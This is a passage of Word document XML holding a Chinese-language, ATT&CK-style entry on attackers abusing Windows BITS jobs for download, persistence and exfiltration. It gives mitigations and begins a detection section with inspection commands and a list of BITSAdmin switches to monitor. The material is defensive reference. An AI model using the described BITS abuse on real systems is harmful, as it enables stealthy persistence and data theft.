            </w:r>
          </w:p>
          <w:p w14:paraId="2B9250D0" w14:textId="0C3CB5E0" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2732F70F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="693CB677" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：用户，管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5930E006" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，网络抓包，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>事件日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="430F3C7E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>绕过的防御：防火墙</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，主机</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>取证</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A908058" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Ricardo Dias</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Red Canary</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54989040" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="476F2600" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E119629" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BITS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（后台智能传输服务）是一种通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（组件对象模型）公开的低带宽异步文件传输机制。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>BITS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常由更新程序、消息程序和其他希望在后台运行（使用可用空闲带宽）而不中断其他网络应用的程序使用。文件传输任务被实现为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>BITS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作业，其中包含一个或多个文件操作队列。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BA534C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BITSAdmin</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>BITS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作业创建和管理接口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A717D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会在运行恶意代码后滥用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>ITS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来实现下载、执行甚至清理动作。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BITS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任务</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>包含在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BITS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作业数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不需创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>新</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>注册表</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，且</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>通常</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>主机防火墙</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BITS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的执行还可以通过创建长期作业（默认最大生命周期为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>90</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>天且可延长）或在作业完成或出现错误（包括系统重启后</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）时调用任意程序来允许持久性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47808AF2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BITS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传功能也可用于执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exfiltration Over Alternative Protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295F4B25" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2118"/>
        <w:gridCol w:w="7618"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00771025" w14:paraId="1C3AE131" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="47D28D21" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00771025">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7618" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="737CF7C9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00771025">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="19842993" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19DDE25B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>流量</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>过滤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70417075" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>修改网络和</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或主机防火墙规则以及其他网络控制，仅允许合法的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>BITS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="2F4DE012" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E3BA39F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId46" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>操作系统配置</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="510105F1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>考虑缩短组策略中的默认</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>BITS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>作业生命周期，或者编辑</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
              </w:rPr>
              <w:t>HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
              </w:rPr>
              <w:t>JobInactivityTimeout</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
              </w:rPr>
              <w:t>MaxDownloadTime</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注册表值。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="73DF45A0" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5999CD22" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C5F6CD6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>考虑限制特定用户或组对</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>BITS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>接口的访问。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="577EFCF1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DBA8018" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D0EAB1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BITS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为服务运行。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sc</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询实用程序（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>sc query bits</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来检查其</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>状态</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。可使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BITSAdmin</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>bitsadmin /list /allusers /verbose</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）枚举活跃的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> BITS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C85734" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BITSAdmin</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具（尤其是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Transfer</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Create</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AddFile</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SetNotifyFlags</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SetNotifyCmdLine</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SetMinRetryDelay</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
